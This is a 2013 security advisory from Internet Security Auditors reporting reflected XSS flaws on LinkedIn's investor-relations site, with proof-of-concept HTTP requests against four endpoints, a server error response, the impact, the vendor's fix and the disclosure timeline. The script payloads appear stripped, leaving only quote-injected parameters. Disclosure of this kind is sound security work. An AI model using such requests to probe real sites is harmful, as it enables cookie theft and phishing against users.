============================================= INTERNET SECURITY AUDITORS ALERT 2013-006 - Original release date: 4th March 2013 - Last revised: 25th March 2013 - Discovered by: Eduardo Garcia Melia - Severity: 4.3/10 (CVSS Base Scored) ============================================= I. VULNERABILITY ------------------------- Multiple Reflected XSS vulnerabilities in LinkedIn Investors. II. BACKGROUND ------------------------- LinkedIn is a social networking service and website(http://www.linkedin.com/) operates the world's largest professional network on the Internet with more than 187 million members in over 200 countries and territories. More Information: http://press.linkedin.com/about III. DESCRIPTION ------------------------- LinkedIn Investors is affected by Multiple reflected Cross-Site Scripting vulnerabilities. An attacker can inject HTML or script code in the context of victim's browser, so can perform XSS attacks, and steal cookies of a targeted user. The affected resource is http://investors.linkedin.com. IV. PROOF OF CONCEPT ------------------------- The XSS vulnerability its in User-Agent: =============== First XSS =============== GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1 Host: investors.linkedin.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 2 =============== Second XSS =============== GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1 Host: investors.linkedin.com Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 2 =============== Third XSS =============== GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'-- HTTP/1.1 Host: investors.linkedin.com Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Referer: http://investors.linkedin.com/stocklookup.cfm Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 2 =============== Fourth XSS =============== GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1 Host: investors.linkedin.com Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Referer: http://investors.linkedin.com/calculator.cfm Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 2 RESPONSE in all cases: HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 04 Mar 2013 11:34:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8

Error occurred processing request

Error Diagnostic

Element RESULT.TITLE is undefined in RELEASEDETAIL.
The error occurred on line 175. Date/Time: Mon Mar 04 06:34:48 EST 2013
Browser:
Remote Address: 192.168.149.88
V. BUSINESS IMPACT ------------------------ This flaw can be used by a malicious user to send phishing to the linked in customers, abusing of the users trust on LinkedIn portal, tricking the user. This user can be forward to a LinkedIn clone site to stolen credentials, to some malicious site hosting malware and more. VI. SYSTEMS AFFECTED ------------------------- The vulnerability affects the LinkedIn Investors: http://investors.linkedin.com VII. SOLUTION ------------------------- Corrected by vendor. VIII. REFERENCES ------------------------- http://investors.linkedin.com http://www.isecauditors.com https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001) IX. CREDITS ------------------------- These vulnerabilities have been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- March 04, 2013: Initial release March 10, 2013: Second release XI. DISCLOSURE TIMELINE ------------------------- March 04, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 10, 2013: Sent to Sec Team. March 25, 2013: Request for update. Response regarding it was already corrected. Sent to lists. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. XIII. ABOUT ------------------------- Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us. XIV. FOLLOW US ------------------------- You can follow Internet Security Auditors, news and security advisories at: https://www.facebook.com/ISecAuditors https://twitter.com/ISecAuditors http://www.linkedin.com/company/internet-security-auditors http://www.youtube.com/user/ISecAuditors